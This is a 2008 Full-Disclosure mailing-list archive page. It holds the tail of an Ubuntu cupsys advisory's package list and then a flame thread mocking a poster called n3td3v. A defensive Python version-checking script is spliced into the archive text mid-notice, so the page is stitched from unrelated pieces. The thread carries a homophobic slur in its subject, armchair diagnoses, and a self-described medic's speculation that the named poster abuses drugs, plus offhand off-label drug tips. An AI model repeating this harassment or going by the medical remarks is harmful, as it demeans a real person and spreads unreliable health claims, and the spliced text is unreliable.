http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3.diff.gz Size/MD5: 156263 0147ec4c77b27e20df2a3ad514c2dd8e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3.dsc Size/MD5: 1143 7fb2ad1b1c8e57b09805fc9d6c1e027d http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8.orig.tar.gz Size/MD5: 4293194 107affe95fcf1cd4aaed4a5c73f4b91f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.2.8-0ubuntu8.3_all.deb Size/MD5: 926414 97df229c931f7eb05af5a5cb623635ae amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_amd64.deb Size/MD5: 37412 20fb406aae21e63dc8c9723e178505af http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_amd64.deb Size/MD5: 83238 9aa9eb876585e32757c83783d79b0a02 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_amd64.deb Size/MD5: 1638304 7673386b3a9d63c09bd3647cf5dad877 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_amd64.deb Size/MD5: 56378 32e2acb4fe5ef7aab8b8896a8d40166c http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_amd64.deb Size/MD5: 104324 649109ddb522145730c67b93a870eefe http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_amd64.deb Size/MD5: 144860 c0fb60ebae640e565607f0cdfd7094b7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_amd64.deb Size/MD5: 182344 204887dda2791a61417415c4466a51d7 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_i386.deb Size/MD5: 36722 22030307f71a44ca7b30921aef0bf46a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_i386.deb Size/MD5: 80738 c92706978d65b9a409d93e704c5662b4 
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_i386.deb Size/MD5: 1620944 bc9a1e338567e27aee10cded16abbcc2 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_i386.deb Size/MD5: 55472 15cd34697cca79ee83498691da531d37 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_i386.deb Size/MD5: 104028 3d13c92bf5f0c9a26f3a8ba534dc6dec http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_i386.deb Size/MD5: 139332 c33597e3bbce0d41df0efe84c2b59377 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_i386.deb Size/MD5: 178604 a93713bb9b422a0460d42dc35eb7f8b3 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_powerpc.deb Size/MD5: 46768 682b1e104c73d8820a5b39ba79de7883 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_powerpc.deb Size/MD5: 101104 78dcf70528f5682b2499efa0b03f6a42 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_powerpc.deb Size/MD5: 1695542 06c8b6b43afa525b07718d410eed6438 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_powerpc.deb Size/MD5: 56226 27ce8328e4cfc184ef64fdfe5bcf1b45 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_powerpc.deb Size/MD5: 109886 607c9d1bdc4eaf3627031f98f59948be http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_powerpc.deb Size/MD5: 141172 501aee8031dd71ce2166e79bfca04129 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_powerpc.deb Size/MD5: 188236 ccbcdb277477728c10dac36435924085 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_sparc.deb Size/MD5: 37788 7da1fb58e7d4b6bfd71ed47b1ba5d201 
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_sparc.deb Size/MD5: 83750 69a59033ea6458f3f82046aee46ba4bb http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_sparc.deb Size/MD5: 1658908 b35167112445c8bc3c1281604412f534 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_sparc.deb Size/MD5: 54756 b877de97919e00870c84850b1e074555 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_sparc.deb Size/MD5: 103574 204efb55b2d46f00cd4f8ddc429d805f http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_sparc.deb Size/MD5: 141742 5e411c3199e1a1296dbd7cd7c6958e1a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_sparc.deb Size/MD5: 177884 4e1b218fd113193e4cf149aea90ec6c7 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6.diff.gz Size/MD5: 125298 81ae6b42c7dd12a1797a63d19c644a8c http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6.dsc Size/MD5: 1218 c56faedc440fc2b16f9a1f396a607d1e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2.orig.tar.gz Size/MD5: 4848424 9e3e1dee4d872fdff0682041198d3d73 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.3.2-1ubuntu7.6_all.deb Size/MD5: 1080444 5d01f105292a526744e5622a14a9aed4 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_amd64.deb Size/MD5: 37204 c3425972caa02e7a25321f49d47c6f9b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_amd64.deb Size/MD5: 89504 5411f2454e0d2a0323e9951cb15a534d http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_amd64.deb Size/MD5: 2034570 c8d6548bd1ba7cb841b196e762da492c 
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_amd64.deb Size/MD5: 59890 150d59889adc8fd0cb185989876a355d http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_amd64.deb Size/MD5: 46780 e15952781e93e862194d453320605bbc http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_amd64.deb Size/MD5: 152020 32c671873dfad4e39104da5c3a6e935e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_amd64.deb Size/MD5: 186028 1a1404a7d67078e31c8819bf3d8d4dae i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_i386.deb Size/MD5: 36476 a982fce3918a91c74e92fb515f1c6d65 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_i386.deb Size/MD5: 86484 0e4d80917e070f7b2f109de81f96bc4d http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_i386.deb Size/MD5: 2018116 cff3abb1b69d797d616e73c93885de3a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_i386.deb Size/MD5: 58634 6d2590c49af04215519a87e857463652 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_i386.deb Size/MD5: 46140 0ebe76bdf799336e0b2d01d0a0eca72c http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_i386.deb Size/MD5: 145694 6766e6515de26b782e211840f330b93e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_i386.deb Size/MD5: 182802 c62bc1107e748c200e6969a239ae8b9b powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_powerpc.deb Size/MD5: 46498 044a54c557dd4006bb40a13dd2c2b156 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_powerpc.deb Size/MD5: 107752 76e4020feb1778e713389fc6bdb86ea9 
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_powerpc.deb Size/MD5: 2099222 73d517a40d877a238856a232e6be64c9 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_powerpc.deb Size/MD5: 59342 8530840cf85bf44c8803fd064b61e1f7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_powerpc.deb Size/MD5: 51716 9d30c790a4b94ac07670d7e15c2e41ab http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_powerpc.deb Size/MD5: 146948 f73327e30e2778bdcf4543c04855e6a1 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_powerpc.deb Size/MD5: 191752 46d534c4c477657ab03419d18f91728f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_sparc.deb Size/MD5: 37564 1771f3f6f2ceb1864696801f7f420e93 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_sparc.deb Size/MD5: 89606 69149447dbd4e3b36185bd977202f837 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_sparc.deb Size/MD5: 2060610 ed932d7ee05e745bc0af647d361e7d99 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_sparc.deb Size/MD5: 57900 7369866ac9adb6abd966e2d1e2f95b42 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_sparc.deb Size/MD5: 45440 60eda5d4cc12eb2c35817d6c0d4ef43a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_sparc.deb Size/MD5: 148476 8e1d119a91b8c6d8d15032b27a498235 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_sparc.deb Size/MD5: 181842 8283739361474f00d65f9bf52d7c0e3d -------------- next part -------------- A non-text attachment was scrubbed... 
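To check whether a host already carries the fix listed in the advisory above, here is an added Python example (not Ubuntu's or dpkg's own code) that reimplements dpkg's version-ordering rules, so that revisions such as `0ubuntu0.6.06.10` versus `0ubuntu0.6.06.8` compare numerically rather than as strings. It reads lines in the format produced by `dpkg-query -W -f='${Package} ${Version}\n' cupsys`; the fixed-version table is copied from the advisory text, and the sample lines in the block are constructed, not real system output.

```python
"""Check an installed cupsys version against the USN-598-1 fixed versions.

Added example: reimplements dpkg's version ordering (epoch, upstream part,
Debian revision; '~' sorts before anything) so the check runs anywhere.
"""

# Fixed package versions, copied from the advisory text above.
FIXED_CUPSYS = {
    "6.06": "1.2.2-0ubuntu0.6.06.8",
    "6.10": "1.2.4-2ubuntu3.3",
    "7.04": "1.2.8-0ubuntu8.3",
    "7.10": "1.3.2-1ubuntu7.6",
}


def _order(c: str) -> int:
    """Sort weight of one character, as in dpkg's verrevcmp(): '~' sorts
    before everything (even end of string), letters before other
    punctuation; end of string and digits weigh 0."""
    if c == "" or c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1
    return ord(c) + 256


def _verrevcmp(a: str, b: str) -> int:
    """Compare two version fragments by alternating non-digit runs
    (character by character via _order) and digit runs (numerically,
    leading zeros ignored). Negative, zero or positive like strcmp()."""

    def ch(s: str, k: int) -> str:
        return s[k] if k < len(s) else ""

    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        # Non-digit run: the first difference in weight decides.
        while (ch(a, i) and not ch(a, i).isdigit()) or (ch(b, j) and not ch(b, j).isdigit()):
            ac, bc = _order(ch(a, i)), _order(ch(b, j))
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        # Digit run: drop leading zeros; a longer run of digits is larger,
        # otherwise the first differing digit decides.
        while ch(a, i) == "0":
            i += 1
        while ch(b, j) == "0":
            j += 1
        while ch(a, i).isdigit() and ch(b, j).isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if ch(a, i).isdigit():
            return 1
        if ch(b, j).isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def _split(version: str):
    """Split 'epoch:upstream-revision' into (epoch, upstream, revision)."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:
        upstream, revision = version, ""
    return epoch, upstream, revision


def compare_versions(v1: str, v2: str) -> int:
    """Return -1, 0 or 1 with the same ordering as `dpkg --compare-versions`."""
    e1, u1, r1 = _split(v1)
    e2, u2, r2 = _split(v2)
    if e1 != e2:
        return 1 if e1 > e2 else -1
    c = _verrevcmp(u1, u2) or _verrevcmp(r1, r2)
    return (c > 0) - (c < 0)


def parse_dpkg_query(line: str):
    # One line of: dpkg-query -W -f='${Package} ${Version}\n' cupsys
    pkg, _, ver = line.strip().partition(" ")
    if not pkg or not ver:
        raise ValueError(f"unexpected dpkg-query line: {line!r}")
    return pkg, ver


def cupsys_is_fixed(release: str, dpkg_query_line: str) -> bool:
    """True when the installed cupsys is at or above the USN-598-1 fix."""
    pkg, installed = parse_dpkg_query(dpkg_query_line)
    if pkg != "cupsys":
        raise ValueError(f"expected cupsys, got {pkg!r}")
    if release not in FIXED_CUPSYS:
        raise ValueError(f"Ubuntu {release} is not covered by USN-598-1")
    return compare_versions(installed, FIXED_CUPSYS[release]) >= 0


if __name__ == "__main__":
    # Constructed sample lines, not output from a real system.
    for release, line in [
        ("6.06", "cupsys 1.2.2-0ubuntu0.6.06.7"),  # one revision short of the fix
        ("6.06", "cupsys 1.2.2-0ubuntu0.6.06.8"),  # exactly the fixed version
        ("7.10", "cupsys 1.3.2-1ubuntu7.10"),      # later revision: 10 > 6 numerically
    ]:
        state = "fixed" if cupsys_is_fixed(release, line) else "VULNERABLE"
        print(f"Ubuntu {release}: {line} -> {state}")
```

On the host itself the same test is a one-liner, `dpkg --compare-versions "$(dpkg-query -W -f='${Version}' cupsys)" ge 1.2.2-0ubuntu0.6.06.8` (exit status 0 means fixed); the Python form is for checking package inventories collected from many hosts where dpkg is not available.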
Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/ccd3dcfe/attachment.bin From hermens.p at gmail.com Thu Apr 3 00:37:44 2008 From: hermens.p at gmail.com (Pat) Date: Thu, 3 Apr 2008 10:37:44 +1100 Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference spamming its fucking gay In-Reply-To: <4b6ee9310804021609x6d0e9c86l91cfb79806be3f6d@mail.gmail.com> References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com> <4b6ee9310804021609x6d0e9c86l91cfb79806be3f6d@mail.gmail.com> Message-ID: Imagine if n3td3v post to *every* mailing list and not just *one*, would you not get tired and frustrated? Sorry mate, I already am. Want to talk about SPAM? I have about 12 emails from YOU this morning, and every single one of them is talking about how you're busy contributing to this and that and the much hyped Storm worm crap. Please go do something, stop emailing everyone about how cool you are. On 03/04/2008, n3td3v wrote: > > On Wed, Apr 2, 2008 at 11:42 PM, Ureleet wrote: > > "Full-Disclosure, I want action taken on the *growing* amount of > > security conference spam." > > > > u do know that just because you demand or want action taken that it > > doesn't mean that such will take place right? > > > > stop trolling. > > > I'm not trolling if I want a security conference mailing list setup so > the rest of us don't need to suffer an inbox of 20 identical > commerical *come to our conference, or, book our training*. > > This is a big issue, and if we dont create a mailing list for it, next > year we won't have 20 duplicates per spam run, we'll have 40 per spam > run. 
> > Imagine if n3td3v post to *every* mailing list and not just *one*, > would you not get tired and frustrated? > > All the best, > > > n3td3v > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/7786e2da/attachment.html From ureleet at gmail.com Thu Apr 3 01:13:28 2008 From: ureleet at gmail.com (Ureleet) Date: Wed, 2 Apr 2008 20:13:28 -0400 Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference spamming its fucking gay In-Reply-To: <3a166c090804021556v7799dfc8n9202438920250548@mail.gmail.com> References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com> <3a166c090804021556v7799dfc8n9202438920250548@mail.gmail.com> Message-ID: <6158bb410804021713l4308360bp9b94e6390f782ebb@mail.gmail.com> lets look at it from a marketing point of view. not everyone is going to be on the conference mailing list. more people are going to be on security mailing lists. i understand your point of view, but it just wont work. Use common sense. On Wed, Apr 2, 2008 at 6:56 PM, n3td3v wrote: > > On Wed, Apr 2, 2008 at 11:42 PM, Ureleet wrote: > > "Full-Disclosure, I want action taken on the *growing* amount of > > security conference spam." > > > > u do know that just because you demand or want action taken that it > > doesn't mean that such will take place right? > > > > stop trolling. 
> > I'm not trolling if I want a security conference mailing list setup so > the rest of us don't need to suffer an inbox of 20 identical > commerical *come to our conference, or, book our training*. > > This is a big issue, and if we dont create a mailing list for it, next > year we won't have 20 duplicates per spam run, we'll have 40 per spam > run. > > Imagine if n3td3v post to *every* mailing list and not just *one*, > would you not get tired and frustrated? > > All the best, > > n3td3v > From ureleet at gmail.com Thu Apr 3 01:15:39 2008 From: ureleet at gmail.com (Ureleet) Date: Wed, 2 Apr 2008 20:15:39 -0400 Subject: [Full-disclosure] n3td3v has a fan In-Reply-To: <4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com> References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com> <4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com> Message-ID: <6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com> you are the one bragging about making a difference, all i see is you being annoying. but i don't know ur full history on the mailing list, but from what i see, its not very positive. and am i annoying everyone? or just you. speaking about stopping the storm worm and trying to stop the storm worm are two different things. On Wed, Apr 2, 2008 at 7:13 PM, n3td3v wrote: > On Wed, Apr 2, 2008 at 11:46 PM, Ureleet wrote: > > you like him because he posts ur articles. > > > > you can have him. > > > > stop trolling. > > I'm the one at the forefront of security trying to make a difference, > and what are you? He supports me because of my cause to stop the Storm > Worm, so what solutions have you got, instead of annoying everyone? > -------------- next part -------------- An HTML attachment was scrubbed... 
From Valdis.Kletnieks at vt.edu Thu Apr 3 03:17:59 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Apr 2008 22:17:59 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference spamming its fucking gay
In-Reply-To: Your message of "Wed, 02 Apr 2008 23:33:50 BST." <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
Message-ID: <27886.1207189079@turing-police.cc.vt.edu>

On Wed, 02 Apr 2008 23:33:50 BST, n3td3v said:
> the big main mailing lists a day or so before. What happens is, folks who
> are good at security, and are subscribed to all the mailing lists, get an
> inbox flooded with duplicate security conference spam, and people aren't
> even interested.

You only get duplicates if you're too unclued to de-dup based on Message-ID:
From techie.micheal at gmail.com Thu Apr 3 03:27:00 2008
From: techie.micheal at gmail.com (Micheal Cottingham)
Date: Wed, 2 Apr 2008 22:27:00 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference spamming its fucking gay
In-Reply-To: <27886.1207189079@turing-police.cc.vt.edu>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu>
Message-ID:

Am I the only one who is getting annoyed by n3td3v speaking in the
third-person like he's an entity, rather than a single person? I suggest
we all take a moment to psycho-analyze this, rather than taking time out
of our day to do our real jobs. ;)

On Wed, Apr 2, 2008 at 10:17 PM, wrote:
> On Wed, 02 Apr 2008 23:33:50 BST, n3td3v said:
> > the big main mailing lists a day or so before. What happens is, folks who
> > are good at security, and are subscribed to all the mailing lists, get an
> > inbox flooded with duplicate security conference spam, and people aren't
> > even interested.
>
> You only get duplicates if you're too unclued to de-dup based on Message-ID:
From mlande at bellsouth.net Thu Apr 3 05:27:35 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Thu, 3 Apr 2008 00:27:35 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conferencespamming its fucking gay
In-Reply-To:
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu>
Message-ID: <030b01c89543$0b481540$6401a8c0@maryl>

Referring to oneself in the third person can be a symptom of identity
confusion or identity alteration, a subset or trait of dissociation. In
ancient times, it was referred to as demonic possession.

Self-objectification is also a trait of narcissism, perhaps because
narcissists love and feel empowered by (possession of) objects. And what
better object for a narcissist to love than themselves, objectified?
Other traits associated with narcissism are bragging, attention-seeking,
delusions of grandeur, etc. In modern times, I believe it is sometimes
referred to as being a bore.

-- Mary

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Micheal Cottingham
Sent: Wednesday, April 02, 2008 10:27 PM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass security conferencespamming its fucking gay

Am I the only one who is getting annoyed by n3td3v speaking in the
third-person like he's an entity, rather than a single person? I suggest
we all take a moment to psycho-analyze this, rather than taking time out
of our day to do our real jobs. ;)

On Wed, Apr 2, 2008 at 10:17 PM, wrote:
> On Wed, 02 Apr 2008 23:33:50 BST, n3td3v said:
> > the big main mailing lists a day or so before.
> > What happens is, folks who
> > are good at security, and are subscribed to all the mailing lists, get an
> > inbox flooded with duplicate security conference spam, and people aren't
> > even interested.
>
> You only get duplicates if you're too unclued to de-dup based on Message-ID:

From pauls at utdallas.edu Thu Apr 3 05:40:53 2008
From: pauls at utdallas.edu (Paul Schmehl)
Date: Wed, 02 Apr 2008 23:40:53 -0500
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conferencespamming its fucking gay
In-Reply-To: <030b01c89543$0b481540$6401a8c0@maryl>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl>
Message-ID:

--On April 3, 2008 12:27:35 AM -0400 Mary Landesman wrote:
> Referring to oneself in the third person can be a symptom of identity
> confusion or identity alteration, a subset or trait of dissociation. In
> ancient times, it was referred to as demonic possession.
>
> Self-objectification is also a trait of narcissism, perhaps because
> narcissists love and feel empowered by (possession of) objects. And what
> better object for a narcissist to love than themselves, objectified?
> Other traits associated with narcissism are bragging, attention-seeking,
> delusions of grandeur, etc. In modern times, I believe it is sometimes
> referred to as being a bore.
>

Or boring a bee?
Paul Schmehl (pauls at utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/

From mikie.simpson at gmail.com Thu Apr 3 09:11:05 2008
From: mikie.simpson at gmail.com (Michael Simpson)
Date: Thu, 3 Apr 2008 09:11:05 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conferencespamming its fucking gay
In-Reply-To:
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl>
Message-ID: <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>

As a medic working as an associate specialist in the treatment of
substance misuse disorder for the last few years n3td3v reminds me of
my patients who indulge in polydrug abuse mainly involving cocaine and
alcohol, often in combination.
This is a very dangerous thing to do due to the 2 drugs being combined
by the liver to form cocaethylene which is significantly more euphoric
and hepatotoxic.

-tip i have done some "n of 1" trials with patients showing that
antabuse (disulphiram) can help with this as it seems to inhibit
dopamine decarboxylase in the brain thus raising basal dopamine levels
reducing cravings as well as preventing alcohol use. Modafinil also
seems quite promising for stimulant misuse but my bosses are being
slow about letting me set up a proper double-blind placebo controlled
study of this.

I also think this is why the analysis of n3td3v done previously came
to the conclusion that it was several separate individuals. It is
merely one guy in different states of intoxication.

The evolution of his evolving addiction and deteriorating mental
health has been quite clear over the last few years.

Soon, if he follows the pattern set by many Scots indulging in hard
drug use he will start to use benzodiazepines more and more and if he
is very unlucky he will be exposed to heroin.
At this point he will go away and FD can return to its true nature as
a list for sec matters with occasional furry pr0n spam.

:-)

mike

From razishaban at gmail.com Thu Apr 3 14:20:32 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Thu, 3 Apr 2008 16:20:32 +0300
Subject: [Full-disclosure] n3td3v has a fan
In-Reply-To: <6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com>
References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com> <4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com> <6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com>
Message-ID: <2d792fb20804030620i795b851cu90c69b3f37dd82e5@mail.gmail.com>

Actually, you're representing the opinion of the majority of the list.
n3td3v is undoubtedly one of the most annoying posters, with an
amazingly inflated sense of self-worth.
-- Razi

From ureleet at gmail.com Thu Apr 3 14:45:03 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 3 Apr 2008 09:45:03 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conferencespamming its fucking gay
In-Reply-To: <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
Message-ID: <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>

or, he's just stupid? spade equals spade.

From ihasshovel at gmail.com Thu Apr 3 14:58:14 2008
From: ihasshovel at gmail.com (DUDE DUDERINO)
Date: Thu, 3 Apr 2008 09:58:14 -0400
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
